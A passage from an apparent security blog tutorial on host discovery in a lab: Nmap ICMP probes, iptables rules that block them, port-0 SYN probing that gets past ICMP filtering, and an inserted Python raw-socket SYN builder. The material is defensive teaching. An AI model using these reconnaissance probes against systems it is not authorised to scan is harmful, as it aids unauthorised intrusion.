enterprise with misconfigured firewalls. Who knows! If you are in a small business with no security team, I would not be surprised if these reconnaissance techniques have not been mitigated at all.</p><p>Enough talking, let's get going. 
Before getting to why a threat actor may target port 0, let's start off with the regular reconnaissance.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;"> ________________               ________________</span>
<span style="color: white;">| THREAT ACTOR  |              |    TARGET     |</span>
<span style="color: white;">| 10.0.0.110    | --------->>> |   10.0.0.100  |</span>
<span style="color: white;">|_______________|              |_______________|</span>
</span></pre></div><p>Starting with the traditional "<i>ping</i>". Running Nmap with the <i>-PE</i> option (ICMP echo request) gives us the following. Note the <i>--send-ip</i> option: without it, Nmap would simply ARP the target on a local Ethernet segment, and none of the ICMP filtering below would matter.<br /></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ sudo Nmap --send-ip -n 10.0.0.100 -sn </span><b><span style="color: #fcff01;">-PE</span></b></span>
<span style="color: white;">Starting Nmap 7.94SVN ( https://Nmap.org ) at 2024-01-30 22:30 EST</span>
<span style="color: white;">Nmap scan report for 10.0.0.100</span>
<span style="color: white;">Host is up (0.00091s latency).</span>
<span style="color: white;">MAC Address: 00:0C:29:A2:BB:D7 (VMware)</span>
<span><span style="color: white;">Nmap done: 1 IP address (</span><b><span style="color: #fcff01;">1 host up</span></b><span style="color: white;">) scanned in 0.26 seconds</span></span>
</pre></div>
<p></p><p>How does Nmap know the host is up? If we look at the <i>tcpdump</i> output on the TARGET, we see the following.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo tcpdump -nnti ens33 'host 10.0.0.110 and icmp'</span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on ens33, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">IP 10.0.0.110 > 10.0.0.100: </span><b><span style="color: #fcff01;">ICMP echo request</span></b><span style="color: white;">, id 59426, seq 0, length 8</span></span>
<span><span style="color: white;">IP 10.0.0.100 > 10.0.0.110: </span><b><span style="color: #fcff01;">ICMP echo reply</span></b><span style="color: white;">, id 59426, seq 0, length 8</span></span>
</pre></div>
<p></p><p>As you can see, the <i>echo request</i> received an <i>echo reply</i>. Let's now block ICMP echo requests on the host firewall to prevent this type of reconnaissance.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --table filter --append INPUT </span><b><span style="color: #fcff01;">--proto icmp</span></b><span style="color: white;"> --in-interface ens33 </span><b><span style="color: #fcff01;">--icmp-type 8/0</span></b><span style="color: white;"> --jump </span><span style="color: #fcff01;"><b>DROP</b></span></span>
</pre></div>
<p></p><p>The rule above silently DROPs the packet. Note that it is specific to ICMP type 8 code 0 (Echo Request) arriving on ens33. Because the request is discarded before it reaches the ICMP handler, the system never gets the chance to send an Echo Reply.</p><p>Let's run Nmap again.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ sudo Nmap --send-ip -n 10.0.0.100 -sn </span><b><span style="color: #fcff01;">-PE</span></b></span>
<span style="color: white;">Starting Nmap 7.94SVN ( https://Nmap.org ) at 2024-01-30 22:47 EST</span>
<span style="color: white;">Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn</span>
<span style="color: white;">Nmap done: 1 IP address (</span><span style="color: #fcff01;"><b>0 hosts up</b></span><span style="color: white;">) scanned in 2.08 seconds</span>
</pre></div>
<p></p><p>Now Nmap is reporting 0 host up. Let's see what was seen via <i>tcpdump</i> on the target.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo tcpdump -nnti ens33 'host 10.0.0.110 and icmp'</span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on ens33, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span style="color: white;">IP 10.0.0.110 > 10.0.0.100: </span><span style="color: #fcff01;"><b>ICMP echo request</b></span><span style="color: white;">, id 55102, seq 0, length 8</span>
<span><span style="color: white;">IP 10.0.0.110 > 10.0.0.100: </span><b><span style="color: #fcff01;">ICMP echo request</span></b><span style="color: white;">, id 16092, seq 0, length 8</span></span>
</pre></div>
<p></p><p>Even though the ICMP Echo Requests came in, no ICMP Echo Reply went out, which is why Nmap reported the host as down. (<i>tcpdump</i> still shows the dropped requests because packet capture happens before netfilter's INPUT chain runs.)</p><p>Confirming the firewall dropped this traffic.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --list INPUT --numeric --verbose</span>
<span style="color: white;">Chain INPUT (policy ACCEPT 0 packets, 0 bytes)</span>
<span style="color: white;"> pkts bytes target prot opt in out source destination</span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b> 2 56 DROP icmp</b></span><span style="color: white;"> -- ens33 * 0.0.0.0/0 0.0.0.0/0 </span><span style="color: #fcff01;"><b>icmptype 8 code 0</b></span>
</pre></div>
<p></p><p>So we have confirmed the firewall is now dropping this traffic. Great! But if you look at the Nmap <i><a href="https://linux.die.net/man/1/nmap" target="_blank">manpage</a></i>, you will see there are other ICMP-based host discovery techniques. Let's try another.</p><p>This time, we use the ICMP <i>Timestamp Request</i> (type 13) method, <i>-PP</i>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo Nmap --send-ip -n 10.0.0.100 -sn </span><span style="color: #fcff01;"><b>-PP</b></span>
<span style="color: white;">Starting Nmap 7.94SVN ( https://Nmap.org ) at 2024-01-30 22:59 EST</span>
<span style="color: white;">Nmap scan report for 10.0.0.100</span>
<span style="color: white;">Host is up (0.00072s latency).</span>
<span style="color: white;">MAC Address: 00:0C:29:A2:BB:D7 (VMware)</span>
<span><span style="color: white;">Nmap done: 1 IP address (</span><b><span style="color: #fcff01;">1 host up</span></b><span style="color: white;">) scanned in 0.14 seconds</span></span>
</pre></div>
<p></p><p>The host is once again reported as up. We can verify what happened by looking at the target.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo tcpdump -nnti ens33 'host 10.0.0.110 and icmp'</span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on ens33, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">IP 10.0.0.110 > 10.0.0.100: </span><b><span style="color: #fcff01;">ICMP time stamp query</span></b><span style="color: white;"> id 7808 seq 0, length 20</span></span>
<span><span style="color: white;">IP 10.0.0.100 > 10.0.0.110: </span><b><span style="color: #fcff01;">ICMP time stamp reply</span></b><span style="color: white;"> id 7808 seq 0: org 00:00:00.000, recv 03:59:38.965, xmit 03:59:38.965, length 20</span></span>
</pre></div>
<p></p><p>So blocking echo requests alone did not stop ICMP-based reconnaissance. Let's now also block the <i>Timestamp Request</i> (type 13).</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --table filter --append INPUT </span><b><span style="color: #fcff01;">--proto icmp </span></b><span style="color: white;">--in-interface ens33 </span><b><span style="color: #fcff01;">--icmp-type 13/0</span></b><span style="color: white;"> --jump </span><b><span style="color: #fcff01;">DROP</span></b></span>
</pre></div>
<p></p><p>Trying the Timestamp reconnaissance again. </p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo Nmap --send-ip -n 10.0.0.100 -sn -PP</span>
<span style="color: white;">Starting Nmap 7.94SVN ( https://Nmap.org ) at 2024-01-30 23:03 EST</span>
<span style="color: white;">Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn</span>
<span><span style="color: white;">Nmap done: 1 IP address (</span><b><span style="color: #fcff01;">0 hosts up</span></b><span style="color: white;">) scanned in 2.08 seconds</span></span>
</pre></div>
<p></p><p>This one is blocked as well: Nmap is again reporting 0 hosts up.</p><p>Let's confirm at our firewall.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --list INPUT --numeric --verbose</span>
<span style="color: white;">Chain INPUT (policy ACCEPT 0 packets, 0 bytes)</span>
<span style="color: white;"> pkts bytes target prot opt in out source destination</span>
<span style="color: white;"> 2 56 DROP icmp -- ens33 * 0.0.0.0/0 0.0.0.0/0 icmptype 8 code 0</span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">2 80 DROP icmp</span></b><span style="color: white;"> -- ens33 * 0.0.0.0/0 0.0.0.0/0 </span><span style="color: #fcff01;"><b>icmptype 13 code 0</b></span></span>
</pre></div>
<p></p><p>We are now blocking the Timestamp Request too. But Nmap also has address mask request discovery (<i>-PM</i>, ICMP type 17). Let's try the last of these Nmap ICMP methods.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ sudo Nmap --send-ip -n 10.0.0.100 -sn </span><b><span style="color: #fcff01;">-PM</span></b></span>
<span style="color: white;">Starting Nmap 7.94SVN ( https://Nmap.org ) at 2024-01-30 23:07 EST</span>
<span style="color: white;">Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn</span>
<span><span style="color: white;">Nmap done: 1 IP address (</span><b><span style="color: #fcff01;">0 hosts up</span></b><span style="color: white;">) scanned in 2.07 seconds</span></span>
</pre></div>
<p></p><p>Oops! Nmap is reporting 0 hosts up. How can this be? We did not block this traffic. Let's see what the target host saw.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo tcpdump -nnti ens33 'host 10.0.0.110 and icmp'</span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on ens33, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">IP 10.0.0.110 > </span><b><span style="color: #fcff01;">10.0.0.100: ICMP address mask request</span></b><span style="color: white;">, length 12</span></span>
<span><span style="color: white;">IP 10.0.0.110 > </span><b><span style="color: #fcff01;">10.0.0.100: ICMP address mask request</span></b><span style="color: white;">, length 12</span></span>
</pre></div>
<p></p><p>The host sees the requests but sends no response, and no firewall rule is involved. Fortunately, in this case, there is nothing for us to do: the Linux network stack silently discards address mask requests, and <a href="https://www.rfc-editor.org/rfc/rfc6918#section-2.4" target="_blank">RFC 6918</a> sections 2.4 and 2.5 formally deprecate this message type. </p><p>However, a threat actor can try other mechanisms, such as crafting packets with <a href="https://www.securitynik.com/2014/05/building-your-own-tcp-3-way-handshake.html" target="_blank">scapy</a>. Keep in mind that although many ICMP types and codes have been deprecated, depending on the system being targeted (an older system? an IoT device?) some of these techniques may still succeed.</p><p>Now, just to be clear, I only blocked those individual types one at a time for the learning experience. The reality is, a single rule blocks all inbound ICMP, as below. Be careful with that in production, though: dropping every inbound ICMP also drops Destination Unreachable (type 3), including the Fragmentation Needed messages that path MTU discovery depends on, and Time Exceeded (type 11). A more surgical ruleset drops only the discovery types (8, 13 and 17) and leaves the rest alone.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --table filter --append INPUT </span><span style="color: #fcff01;"><b>--proto icmp</b></span><span><span style="color: white;"> --in-interface ens33 --jump </span><b><span style="color: #fcff01;">DROP</span></b></span>
<span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --list INPUT --numeric --verbose</span>
<span style="color: white;">Chain INPUT (policy ACCEPT 0 packets, 0 bytes)</span>
<span style="color: white;"> pkts bytes target prot opt in out source destination</span>
<span><span style="color: white;"> 0 0 </span><b><span style="color: #fcff01;">DROP icmp </span></b><span style="color: white;">-- ens33 * 0.0.0.0/0 0.0.0.0/0</span></span>
</pre></div>
<p></p><p>If we run the scans above again, all of them should be blocked. You should then see something like the below in your firewall table.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --list INPUT --numeric --verbose</span>
<span style="color: white;">Chain INPUT (policy ACCEPT 0 packets, 0 bytes)</span>
<span style="color: white;"> pkts bytes target prot opt in out source destination</span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">6 200 DROP icmp</span></b><span style="color: white;"> -- ens33 * 0.0.0.0/0 0.0.0.0/0</span></span>
</pre></div>
<p></p><p>That completes the groundwork for why port 0 matters.</p><p>Here we go! The firewall is now blocking all ICMP traffic. However, from the attacker's side we are still interested in simply knowing whether the host is up. Let's figure that out.</p><p>First things first: no service should ever listen on port 0. IANA reserves port 0 for both TCP and UDP, and on Linux a bind() to port 0 means "give me an ephemeral port", not "listen on 0". For example, running netstat, or in my case <i>ss</i>, on the target shows:</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo ss --numeric --listening --tcp</span>
<span style="color: white;">State Recv-Q Send-Q Local Address:Port Peer Address:Port Process</span>
<span style="color: white;">LISTEN 0 4096 0.0.0.0:27017 0.0.0.0:*</span>
<span style="color: white;">LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*</span>
<span style="color: white;">LISTEN 0 128 0.0.0.0:22 0.0.0.0:*</span>
<span style="color: white;">LISTEN 0 244 0.0.0.0:5432 0.0.0.0:*</span>
<span style="color: white;">LISTEN 0 128 [::]:22 [::]:*</span>
<span style="color: white;">LISTEN 0 244 [::]:5432 [::]:*</span>
</pre></div>
<p></p><p>Nothing listens on port 0. So why would an attacker target port 0? Let's run Nmap with <i>-Pn</i> (skip host discovery) and <i>--reason</i> to find out.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span><span style="color: white;">└─$ sudo nmap --send-ip -n 10.0.0.100 -Pn </span><b><span style="color: #fcff01;">-p 0 --reason</span></b></span>
<span style="color: white;">Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-30 23:27 EST</span>
<span style="color: white;">Nmap scan report for 10.0.0.100</span>
<span style="color: white;">Host is up, received user-set (0.00052s latency).</span>
<span><span style="color: white;">PORT STATE SERVICE </span><b><span style="color: #fcff01;">REASON</span></b></span>
<span><span style="color: white;">0/tcp closed unknown </span><b><span style="color: #fcff01;">reset </span></b><span style="color: white;">ttl 64</span></span>
<span style="color: white;">MAC Address: 00:0C:29:A2:BB:D7 (VMware)</span>
<span><span style="color: white;">Nmap done: 1 IP address (</span><b><span style="color: #fcff01;">1 host up</span></b><span style="color: white;">) scanned in 0.20 seconds</span></span>
</pre></div>
<p></p><p>Nmap reports port 0/tcp as <i>closed</i>, and the REASON column tells us how it knows: it received a TCP "<i>reset</i>". That reset is what tells the attacker the host is alive; the "1 host up" line on its own is just <i>-Pn</i> at work, which we will come back to shortly. We can confirm at the target host that it did send a <i>reset</i>:</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo tcpdump -nnti ens33 'host 10.0.0.110 and port 0'</span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on ens33, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span><span style="color: white;">IP 10.0.0.110.61475 > 10.0.0.100.0: </span><b><span style="color: #fcff01;">Flags [S]</span></b><span style="color: white;">, seq 1785192689, win 1024, options [mss 1460], length 0</span></span>
<span><span style="color: white;">IP 10.0.0.100.0 > 10.0.0.110.61475: </span><b><span style="color: #fcff01;">Flags [R.]</span></b><span style="color: white;">, seq 0, ack 1785192690, win 0, length 0</span></span>
</pre></div>
<p></p><p>So what was the objective? Even with ICMP blocked, a threat actor can send a SYN to port 0 purely to elicit this <i>[R.]</i> (RST/ACK). Any closed TCP port would produce the same reset; port 0 is attractive because no legitimate service ever listens there, so it is rarely considered when firewall rules are written. The reset confirms the host is online, which gives the threat actor the same result as a ping that got a response.</p><p>Let's close this off by blocking traffic coming in to port 0.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --table filter --append INPUT </span><b><span style="color: #fcff01;">--proto tcp --dport 0</span></b><span style="color: white;"> --in-interface ens33 --jump </span><b><span style="color: #fcff01;">DROP</span></b></span></pre></div><p>Run the scan again.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~]</span>
<span style="color: white;">└─$ sudo nmap --send-ip -n 10.0.0.100 -Pn -p 0 --reason</span>
<span style="color: white;">Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-30 23:32 EST</span>
<span style="color: white;">Nmap scan report for 10.0.0.100</span>
<b><span style="color: #fcff01;"><span>Host is up, received user-set.</span>
</span></b>
<span><span style="color: white;">PORT STATE SERVICE </span><b><span style="color: #fcff01;">REASON</span></b></span>
<span><span style="color: white;">0/tcp filtered unknown</span><b><span style="color: #fcff01;"> no-response</span></b></span>
<span style="color: white;">Nmap done: 1 IP address (</span><span style="color: #fcff01;"><b>1 host up</b></span><span style="color: white;">) scanned in 2.10 seconds</span>
</pre></div>
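<p>The two captures in this section show the exchange from both sides: a SYN to port 0 answered with an RST/ACK, then the same SYN getting nothing once the INPUT rule is in place. The Python below is an added example, not code from the original post. It builds that SYN byte for byte (SYN to port 0, win 1024, an MSS option, as in the capture) and checks a reply the way tcpdump and Nmap read it. The addresses, ports and sequence numbers are the post's values, but the bytes are constructed here rather than captured, and the raw-socket send at the bottom (which needs root) is an assumption about how one would fire the probe by hand, not something the post ran.</p>

```python
"""Added example (not from the original post): the TCP exchange behind a port-0 probe,
built and checked offline. Addresses, ports and sequence numbers come from the post's
capture; the segments are constructed here, not captured."""
import socket
import struct

TCP_FIN, TCP_SYN, TCP_RST, TCP_PSH, TCP_ACK = 0x01, 0x02, 0x04, 0x08, 0x10
SCANNER, TARGET = "10.0.0.110", "10.0.0.100"   # the post's lab addresses


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum of 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _pseudo_header(src_ip, dst_ip, tcp_len):
    return struct.pack("!4s4sBBH", socket.inet_aton(src_ip), socket.inet_aton(dst_ip),
                       0, socket.IPPROTO_TCP, tcp_len)


def build_segment(src_ip, dst_ip, sport, dport, seq, ack, flags, window, options=b""):
    """TCP header (plus options) with the checksum computed over the IPv4 pseudo-header."""
    options += b"\x00" * (-len(options) % 4)          # options are padded to 32-bit words
    data_offset = (20 + len(options)) // 4
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack,
                      data_offset << 4, flags, window, 0, 0) + options
    csum = checksum(_pseudo_header(src_ip, dst_ip, len(hdr)) + hdr)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:]


def build_syn(src_ip, dst_ip, sport, seq, dport=0, window=1024, mss=1460):
    """The probe from the post: SYN to port 0, win 1024, options [mss 1460]."""
    return build_segment(src_ip, dst_ip, sport, dport, seq, 0, TCP_SYN, window,
                         struct.pack("!BBH", 2, 4, mss))


def checksum_ok(src_ip, dst_ip, segment: bytes) -> bool:
    """A segment whose stored checksum is right sums to zero with its pseudo-header."""
    return checksum(_pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


def parse_tcp(segment: bytes) -> dict:
    """Fixed header fields plus the flag string in tcpdump notation ("S", "R.", "S.")."""
    sport, dport, seq, ack, off, flags, window = struct.unpack("!HHIIBBH", segment[:16])
    text = "".join(ch for bit, ch in ((TCP_FIN, "F"), (TCP_SYN, "S"),
                                      (TCP_RST, "R"), (TCP_PSH, "P")) if flags & bit)
    text += "." if flags & TCP_ACK else ""             # tcpdump prints ACK as a dot
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack, "flags": flags,
            "window": window, "tcpdump_flags": text, "header_len": (off >> 4) * 4}


def is_rst_for(probe: dict, reply: dict) -> bool:
    """True if reply is the RST/ACK a closed port sends for probe: ports mirrored,
    RST and ACK set, acknowledgement = probe seq + 1 (the SYN consumes one number)."""
    return (reply["sport"] == probe["dport"] and reply["dport"] == probe["sport"]
            and (reply["flags"] & (TCP_RST | TCP_ACK)) == (TCP_RST | TCP_ACK)
            and reply["ack"] == ((probe["seq"] + 1) & 0xFFFFFFFF))


if __name__ == "__main__":
    # Assumed manual send; needs CAP_NET_RAW. Linux prepends the IP header for an
    # IPPROTO_TCP raw socket, and any reset shows up in tcpdump 'port 0' on either host.
    syn = build_syn(SCANNER, TARGET, 61475, 1785192689)
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP) as s:
        s.sendto(syn, (TARGET, 0))
```

<p>The point of <i>is_rst_for()</i> is the detail the firewall experiment later in this post runs into: the reset is addressed from port 0 to the scanner's ephemeral port, so anything keyed on destination port 0 (a rule, a capture filter) sees the probe but never the answer. <i>tcpdump 'port 0'</i> matches either direction, which is why the post's captures show both.</p>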
<p></p><p>The REASON for the port is now <i>no-response</i> (state <i>filtered</i>), yet Nmap still reports 1 host up. That is not a contradiction, and it is not ARP: the scan was run with <i>-Pn</i>, which skips host discovery and treats every target as up, and the "<i>Host is up, received user-set</i>" line is Nmap saying exactly that. See the reference section for the Stack Exchange discussion of the <i>user-set</i> reason. Worth noting too: without <i>-Pn</i>, Nmap's default privileged host discovery sends an ICMP echo request, a TCP SYN to port 443, a TCP ACK to port 80 and an ICMP timestamp request, so the TCP probes would still have found this host through a reset from port 443 or 80. Blocking ICMP and port 0 alone does not make a host invisible.</p><p>If we look at the host, we can see the SYNs came in but no [R.] was sent.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@seruritynik-srv:~$ sudo tcpdump -nnti ens33 'host 10.0.0.110 and port 0'</span>
<span style="color: white;">tcpdump: verbose output suppressed, use -v[v]... for full protocol decode</span>
<span style="color: white;">listening on ens33, link-type EN10MB (Ethernet), snapshot length 262144 bytes</span>
<span style="color: white;">IP 10.0.0.110.46295 > 10.0.0.100.0: </span><span style="color: #fcff01;"><b>Flags [S]</b></span><span style="color: white;">, seq 11534259, win 1024, options [mss 1460], length 0</span>
<span><span style="color: white;">IP 10.0.0.110.46297 > 10.0.0.100.0: </span><b><span style="color: #fcff01;">Flags [S]</span></b><span style="color: white;">, seq 11403185, win 1024, options [mss 1460], length 0</span></span>
<span><span style="color: white;">IP 10.0.0.110.39645 > 10.0.0.100.0: </span><b><span style="color: #fcff01;">Flags [S]</span></b><span style="color: white;">, seq 465318364, win 1024, options [mss 1460], length 0</span></span>
<span><span style="color: white;">IP 10.0.0.110.39647 > 10.0.0.100.0: </span><b><span style="color: #fcff01;">Flags [S]</span></b><span style="color: white;">, seq 465449438, win 1024, options [mss 1460], length 0</span></span>
<span><span style="color: white;">IP 10.0.0.110.65137 > 10.0.0.100.0: </span><b><span style="color: #fcff01;">Flags [S]</span></b><span style="color: white;">, seq 899162038, win 1024, options [mss 1460], length 0</span></span>
<span><span style="color: white;">IP 10.0.0.110.65139 > 10.0.0.100.0: </span><b><span style="color: #fcff01;">Flags [S]</span></b><span style="color: white;">, seq 899293108, win 1024, options [mss 1460], length 0</span></span>
</pre></div>
<p></p><p>The capture confirms the firewall is dropping the port 0 probes: the SYNs came in, but no RST/ACK went out.</p><p>I decided to try another trick, just in case for some strange reason the RST was being generated and I was not seeing it. This time, I configured the firewall to prevent the RST from leaving the device. Note, though, that the rule below keys on <i>--dport 0</i>, while a reset to this probe leaves the target with <i>source</i> port 0 and the scanner's ephemeral port as destination (<i>10.0.0.100.0 > 10.0.0.110.61475</i> in the earlier capture). As written, the rule can never match an outbound reset; <i>--sport 0</i> is the match that would.</p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">securitynik@seruritynik-srv:~$ sudo iptables --table filter </span><b style="color: white;">--append OUTPUT</b><span style="color: white;"> </span><b><span style="color: #fcff01;">--proto tcp --dport 0 --tcp-flags RST RST</span></b><span style="color: white;"> --out-interface ens33 --jump </span><b><span style="color: #fcff01;">DROP</span></b></span>
</pre></div>
